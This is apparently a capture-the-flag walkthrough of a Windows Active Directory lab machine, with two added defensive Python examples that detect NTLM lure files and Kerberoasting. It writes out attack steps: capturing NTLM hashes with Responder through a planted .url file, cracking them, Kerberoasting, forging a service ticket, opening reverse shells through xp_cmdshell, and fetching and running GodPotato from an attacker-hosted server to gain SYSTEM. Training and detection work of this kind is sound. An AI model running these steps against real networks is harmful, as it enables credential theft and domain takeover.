Breach
(Medium, Windows, Vulnlab Machine)

OVERVIEW

We are given the machine IP and told that the user flag is in C:\share\transfer. Let's scan the machine for open ports and services with Nmap.
ENUMERATION

As you can see, many ports are open, and the scan also gave us the domain name and the domain controller hostname, so add this information to /etc/hosts.
Let's first check the SMB shares:
Since we don't have a username and password yet, we will try a Guest/Anonymous login.
I am using smbmap; you can use netexec as well.

We found 3 shares: we have read access to two of them and READ,WRITE access to one.
Let's check out the share using smbclient.

On accessing the share we found three directories, two of which are empty; inside the transfer directory there are 3 more user directories, and listing them is denied.
Since we have read and write access on the share, we can steal NTLM creds by uploading a file to the share using smbclient.
GETTING NTLM HASH
For this I am using the ntlm_theft tool to generate the files.

We will use the icon file: move it to the directory from which you will run smbclient, and rename it to shell.url for readability.
First, turn on Responder in another terminal using
sudo responder -I tun0 -wdv
Now log in with smbclient again, go to the transfer directory, put shell.url inside it, and wait about 2 minutes; you will get the NTLM hash of the user Julia.Wong.
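The reason this works is that the share is writable by everyone and a dropped .url/.scf file with a remote IconFile path makes Explorer authenticate to that host as soon as someone browses the folder. The defender-side counterpart is to sweep writable shares for exactly that pattern. The following is an added example (not part of the original write-up or of the ntlm_theft project): it walks a local mirror of a share and flags .url and .scf files whose IconFile/URL/WorkingDirectory fields point at a UNC host. The sample share layout and the 192.0.2.10 address are constructed for the example.

```python
"""Sweep a file share for NTLM-leak lure files (.url / .scf with UNC icon paths).

Added, defender-side example; not part of the original write-up or of ntlm_theft.
The sample share and the 192.0.2.10 address below are constructed.
"""
import os
import re
import tempfile
from pathlib import Path

LURE_EXTENSIONS = {".url", ".scf"}
# INI-style keys that Explorer dereferences when rendering the file's icon/preview
UNC_FIELDS = ("iconfile", "url", "workingdirectory")
# Matches \\host\share\... or file://host/share/...
UNC_RE = re.compile(r"^(\\\\[^\\]+\\.+|file://[^/]+/.+)$", re.IGNORECASE)


def parse_ini_fields(text):
    """Return {lowercased key: value} for key=value lines, ignoring section headers."""
    fields = {}
    for line in text.splitlines():
        if "=" not in line or line.lstrip().startswith(("[", ";")):
            continue
        key, _, value = line.partition("=")
        fields[key.strip().lower()] = value.strip()
    return fields


def classify(path):
    """Return (field, value) for the first field that points at a UNC host, else None."""
    try:
        text = Path(path).read_text(encoding="utf-8", errors="ignore")
    except OSError:
        return None
    fields = parse_ini_fields(text)
    for key in UNC_FIELDS:
        value = fields.get(key, "")
        if UNC_RE.match(value):
            return key, value
    return None


def find_lure_files(root):
    """Walk `root`; return sorted (relative path, field, UNC value) for each lure file."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if Path(name).suffix.lower() not in LURE_EXTENSIONS:
                continue
            full = os.path.join(dirpath, name)
            hit = classify(full)
            if hit:
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                findings.append((rel, *hit))
    return sorted(findings)


def build_sample_share(root):
    """Create a constructed share: one benign .url, one lure .url, one lure .scf."""
    transfer = Path(root) / "transfer"
    transfer.mkdir(parents=True)
    (transfer / "readme.url").write_text(            # benign: local icon, https URL
        "[InternetShortcut]\nURL=https://example.com/docs\n"
        "IconFile=C:\\Windows\\System32\\shell32.dll\nIconIndex=1\n")
    (transfer / "shell.url").write_text(             # lure: icon served from a UNC host
        "[InternetShortcut]\nURL=file://192.0.2.10/s/x.txt\n"
        "IconFile=\\\\192.0.2.10\\s\\shell.icon\nIconIndex=1\n")
    (transfer / "thumbs.scf").write_text(            # lure: .scf variant of the same trick
        "[Shell]\nCommand=2\nIconFile=\\\\192.0.2.10\\s\\t.ico\n[Taskbar]\nCommand=ToggleDesktop\n")
    (Path(root) / "docs").mkdir()
    (Path(root) / "docs" / "notes.txt").write_text("see \\\\192.0.2.10\\s\n")  # wrong extension, ignored


def demo():
    """Build the sample share in a temp dir and return the findings."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_share(root)
        return find_lure_files(root)


if __name__ == "__main__":
    for rel, field, value in demo():
        print(f"LURE  {rel}: {field}={value}")
```

Run it against a mounted copy of the share on a schedule, or hook the same `classify` logic into a file-creation audit. Binary .lnk files carry the same risk but need a proper shell-link parser, which this example does not include; the structural fix is to remove anonymous/guest write access on the share and to block outbound SMB (TCP 445) from workstations to anything that is not a known file server.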

Now save the hash in hash.txt and use John The Ripper with the rockyou.txt wordlist to crack it and get the password.
Now check whether it is valid using netexec.

It is valid.
USER FLAG
Now you can get your user.txt from C:\share\transfer using smbclient, logged in as Julia.Wong.

EXPLOITATION
Now that we have a valid user password, we can run BloodHound to visualize the relationships between users, OUs, groups, etc.
bloodhound-python -u 'julia.wong' -p 'JULIA-PASS' -d breach.vl -ns 10.129.13.42 -c ALL --zip
While enumerating in BloodHound we find that there is one other Kerberoastable account besides krbtgt: svc_mssql.

Looking at the node info of svc_mssql, we see that Admin Count = False, which means we can create a ticket for it to impersonate a high-privileged user; but first let's find its password.
Since it is a Kerberoastable account, we can use NetExec to get its hash and then crack it, or you can use Impacket's GetUserSPNs.

Crack the hash with John The Ripper to get the password for svc_mssql, then verify it.
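What the Kerberoast step leaves behind on the domain controller is a Security event 4769 (service ticket requested) for a user service account, typically requested with RC4 (TicketEncryptionType 0x17) because the tool asks for the weakest etype to make offline cracking cheap, and usually several such requests in quick succession when a tool pulls every SPN at once. The following is an added example, not part of the original write-up: it runs both checks over a handful of constructed 4769 records whose field names mirror the Windows event XML (the timestamps, hostnames, IPs and the extra svc_web/svc_backup accounts are made up).

```python
"""Spot Kerberoasting in Windows Security log 4769 events.

Added, defender-side example; not part of the original write-up.
The SAMPLE_4769 records are constructed: field names follow the 4769 event XML,
values are invented.
"""
from collections import defaultdict
from datetime import datetime, timedelta

SAMPLE_4769 = [  # constructed sample events
    {"time": "2024-05-01T10:00:01", "TargetUserName": "julia.wong@BREACH.VL",
     "ServiceName": "krbtgt", "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.50"},
    {"time": "2024-05-01T10:00:05", "TargetUserName": "julia.wong@BREACH.VL",
     "ServiceName": "DC01$", "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.50"},
    {"time": "2024-05-01T10:00:09", "TargetUserName": "julia.wong@BREACH.VL",
     "ServiceName": "svc_mssql", "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.50"},
    {"time": "2024-05-01T10:00:10", "TargetUserName": "julia.wong@BREACH.VL",
     "ServiceName": "svc_web", "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.50"},
    {"time": "2024-05-01T10:00:11", "TargetUserName": "julia.wong@BREACH.VL",
     "ServiceName": "svc_backup", "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.50"},
    {"time": "2024-05-01T11:30:00", "TargetUserName": "bob@BREACH.VL",
     "ServiceName": "svc_mssql", "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.77"},
]

# 0x17 = RC4-HMAC, 0x18 = RC4-HMAC-EXP; AES128/AES256 are 0x11/0x12
RC4_ETYPES = {"0x17", "0x18"}


def is_user_service_account(service_name):
    """krbtgt and computer accounts (trailing $) have strong keys; user SPNs are the target."""
    return service_name.lower() != "krbtgt" and not service_name.endswith("$")


def flag_rc4_service_tickets(events):
    """Signal 1: service tickets for user accounts issued with an RC4 etype."""
    return [e for e in events
            if is_user_service_account(e["ServiceName"])
            and e["TicketEncryptionType"].lower() in RC4_ETYPES]


def flag_spn_sweeps(events, window=timedelta(minutes=5), threshold=3):
    """Signal 2: one client requesting tickets for >= threshold distinct user SPNs within `window`.

    Returns {(requesting user, client IP): sorted list of service names}.
    """
    by_client = defaultdict(list)
    for e in events:
        if is_user_service_account(e["ServiceName"]):
            key = (e["TargetUserName"], e["IpAddress"])
            by_client[key].append((datetime.fromisoformat(e["time"]), e["ServiceName"]))
    sweeps = {}
    for client, reqs in by_client.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):          # slide the window from each request
            names = {name for t, name in reqs[i:] if t - t0 <= window}
            if len(names) >= threshold:
                sweeps[client] = sorted(names)
                break
    return sweeps


if __name__ == "__main__":
    for e in flag_rc4_service_tickets(SAMPLE_4769):
        print(f"RC4 ticket: {e['TargetUserName']} -> {e['ServiceName']} from {e['IpAddress']}")
    for (user, ip), names in flag_spn_sweeps(SAMPLE_4769).items():
        print(f"SPN sweep: {user} from {ip} requested {names}")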

Now that we have the password for svc_mssql, let's move on to impersonating a high-privileged user using Impacket's ticketer.py.
ticketer.py -user svc_mssql -nthash NT-HASH -domain breach.vl -domain-sid DOMAIN-SID -spn SPN administrator
Replace NT-HASH with the NT hash of the svc_mssql password, which you can generate with this website:
https://hashes.com/en/generate/hash
Replace DOMAIN-SID and SPN with the values from the BloodHound node info of svc_mssql.

export KRB5CCNAME=administrator.ccache

Now we can enable xp_cmdshell and use it to execute a reverse shell, which gives us a shell as breach\svc_mssql.
enable_xp_cmdshell
xp_cmdshell powershell-base64-rev-shell-payload
Use a reverse shell payload from https://www.revshells.com/ and start the listener.

PRIVILEGE ESCALATION / ROOT FLAG
Let's see what privileges the user has.

As you can see, SeImpersonatePrivilege is enabled,
so we can use GodPotato (or SweetPotato).
Start a Python web server using
python3 -m http.server 8000
Now download it into the shell with iwr, into C:\Users\svc_mssql\Documents:
iwr http://YOUR-IP:PORT/GodPotato-NET4.exe -OutFile GodPotato-NET4.exe
Now run:
.\GodPotato-NET4.exe -cmd 'powershell-revshell-base64-cmd' #be sure to change the port
Now check your listener: you will get a shell as NT AUTHORITY\SYSTEM, and from there you can get the root flag.

WE FINALLY DID IT !!!! CHALLENGE SOLVED !!

For Any Query Or Problem Either Leave A Comment Or Contact At reapsec.com
THANKS FOR READING !!!